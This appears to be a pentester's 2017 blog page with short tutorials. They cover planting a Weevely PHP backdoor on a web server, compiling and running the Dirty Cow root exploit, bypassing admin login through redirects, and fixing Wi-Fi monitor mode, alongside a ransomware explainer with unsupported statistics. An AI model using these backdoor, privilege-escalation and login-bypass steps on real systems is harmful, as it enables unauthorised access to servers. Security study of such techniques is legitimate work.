• Twitter
  • Facebook
  • Youtube

About me

Let me introduce myself


A bit about me

Ifrah Iman is a Penteration Tester & Web Application Security Resarcher from Pakistan.

Profile

Ifrah Iman

Personal info

Ifrah Iman

•Web App Security Researcher & Penetration Tester •Programmer & Coder

Read More

Blog Posts

Read My Articles


Tuesday, 23 May 2017

Ransomwares

Now don't say that you havent heard the name of "Ransomware". Because these days, Ransomware attacks are on the trending & everyone is getting affected with this weird malware, virus named Ransomware.



WHAT IS RANSOMWARE ?

Ransomware is a Malware, which crypts or locks all of your data & asks you a Ransom (Money Payback) for the decryption key to get back all of your Data.

Sounds Scary ! Well it is scary ! Ransomware's are very difficult to get patched. Also according to a research 88% of the computers infected with Ransomware's, paid the Ransom but never got the decryption key.

So you'll be thinking that as a normal person why do you have pay $$$ to get your data back? You can format all of data, and reinstall everything back. But this is not possible for everyone.
Because Ransomwares usually attack Offices, Hospitals, Schools, Banks, Government establishments, and you know that there data is very important for them, because it contains all of there records, reports even Money credentials ETC. Thats why Ransomwares usually target business organizations where the data is more important. Thats how they earn !

HOW ARE RANSOMWARES MADE ?

Now if you'll lookup on the internet about downloading an ransomware, you'll get a lot of links which say you to buy it. But believe it, Ransomware can be easily be coded. You just have to create a program which encrypt's the user data, asks for the decryption key. Further more you can try adding in an exploit for getting advantage over a vulnerability.

HOW TO PROTECT YOURSELVES FROM RANSOMWARES ?

To protect yourselves from the ransomwares follow these steps:
- Upgrade your current operating system to the new one & also update it.
- Use an updated antivirus program and a spyware.
- Dont download any file from untrusted source.
- Close your open ports.

If you liked the article please share it ;_; it will save someones life.

Monday, 24 April 2017

Weevely Backdoor - Remote Code Execution

Today in this article I’ll show you how you can backconnect to a web server without any port forwarding through weevely.



Weevely is a tool which creates a Backdoor in PHP. Then we can upload that as a shell on that website. Then through the terminal we can access the server by connecting to that shell by entering the url & password.

Steps:

1- First create a backdoor with weevely:

weevely generate password-location/shell.php


Above command is the usage of creating  a backdoor. You have to replace password with any password and location with location where you want it to generate then the name of shell with extension php.  For example:

weevely generate pass123 /root/Desktop/backdoor.php



2- Now go to the web, and upload the shell there.
Now we need to backconnect with it, for getting the access to the server via cli. So for that type this command:

weevely link-of-backdoor password

Here you need to enter the link of the backdoor which you uploaded, and enter its password as well, e.g:

weevely http://site.com/backdoor.php pass123


3- Finally we have got the access to the server, try entering a command e.g whoami id  or uname -a, for finding detail of that server for further exploitation.


Thanks for reading, please share.

Sunday, 16 April 2017

OWASP TOP 10 - 2017

Owasp recently released the top 10 web application vulnerabilities for the year 2017 few days ago.

owasp top ten

Following are the top 10 vulnerabilities which make the web applications at a risk in the year 2017:

owasp top 10 2017

Last owasp top 10 vulnerabilities were released in 2013, and if you'll see there isnt very much difference;

owasp top 10 2017 2013

Still Injection is at the Top, and Authentication Flaws at second. What I am shocked about is that Cross Site Scripting is at third, where it should'nt be.

A4, A7 & A10 are only changed, execept all are same..

You can download the PDF from here.

Friday, 7 April 2017

Dirty Cow POC ( Privilege Escalation Exploit )

Dirty Cow exploit is a very famous  privilge escalation open source exploit released back in November 2016. The exploit was used a lot by hackers on mostly web servers to gain the local root access in the shell.



Today I’ll show you the demonstration of this exploit.

So goto : https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs and you’ll see a lot of POC’s here, I’ll be using dirty.c poc for the exploit. I’ll clone it in my machine.

Steps:

1- As default, we need to change the username, for that open the poc with a editor and you’ll see something like this:

user.username = "firefart";


Just edit it and change firefart & write your name and thus it will look like this:

user.username = "iman";


Save it and close. Make a new folder and move the poc there.


2- Since the poc is in C, we’ll compile it, for that Just type the following command in your console:

gcc -pthread dirty.c -o anyname -lcrypt

Here you can change anyname to anyname :P


3- Now you’ll notice a new executable is created automatically in the directory. Run it:


./anyname password here

Here anyname is the name you choose while compiling the poc and password could be any password you’ll like to choose.


4- Now press enter , you’ll see it running. Open up a new terminal and see username changed And yes don’t forget the following command after using the exploit for restoring your password:

mv /tmp/passwd.bak /etc/passwd


This exploit doesnot works on all servers, but its better to check it from the official site, still this is the best method for privilege escalation.


Thursday, 6 April 2017

Fix WiFi Interface Monitor Mode Problems

Hello, in this article I'll tell you a simple way for solving most of monitor mode problems which we get in airodump, airmon & custom scripts or tools.



So incase if monitor mode is already activated and not working, then it needs to be refreshed a little bit. And the most of problems occur if it is not refreshed, incase suppose you were trying to use 2 scripts or tools which require monitor mode at the same time. Or usually this problem occurs with wlan0mon

Just take a look:

root@h3llcat: airodump-ng wlan0mon
Failed ! No device or resource busy

or any other type of error if you are facing should be solved.

Steps:


1- Just open up a new terminal and type in:

root@h3llcat: airmon-ng

Just to check your current interface & monitor mode.

2- Now type the following:

root@h3llcat: airomon-ng stop interface_name

Incase if you saw 2 interfaces in step 1, suppose wlan0 and mon0 different, then stop the both one by one. If you had only one like wlan0 or wlan0mon then do it once.

3- Now type this:

root@h3llcat: ifconfig interface_name down

Here if you had two interfaces before like wlan0 and mon0 then only stop wlan0, also same if you had wlan0mon


So by now your problem must be solved. I got this problem a lot of time so i found a solution and thought to share. You can also watch the following video for demonstration:

Tuesday, 21 March 2017

Redirection Vulnerability & Admin Panel Bypass

In this exploit, I will talk about the Redirection Vulnerability & How to Exploit it. 



On local sites we can exploit it by bypassing the admin panel, and we can get straightly to the admin panel without logging in using any credentials.


Steps:

First of all we'll have to find out if the website has the redirection flaw in it or not. And for doing that we will first find the Admin panel of the site.

Suppose we have got the admin panel login which is :

www.site.com/admin/index.php

Now we will try to figure any other link inside the Admin panel such as Admin Gallery, Admin Home, Admin Dashboard, Admin Settings.

Suppose we found one which is :

www.site.com/admin/dashboard.php

Now this exploit will only work if there is any redirection in these two links like, I have not logged in to the admin panel, I will first visit the First link which asks for login,  then I will change the link to Dashboard.

I will see that whenever i go to www.site.com/admin/dashboard.php the link automatically redirects to www.site.com/admin/index.php (which is the admin login)

If the redirection occurs then the website is vulnerable. We can now try exploiting it :)



Exploitation:

OK so now its time to exploit it.
Install the NoRedirect addon on your Firefox. And open it, add the Admin Panel Login link over there. Click save.

Now just visit www.site.com/admin/dahsboard , you will see the Dashboard automatically gets opened, without logging in.

If you are having difficulties watch this video: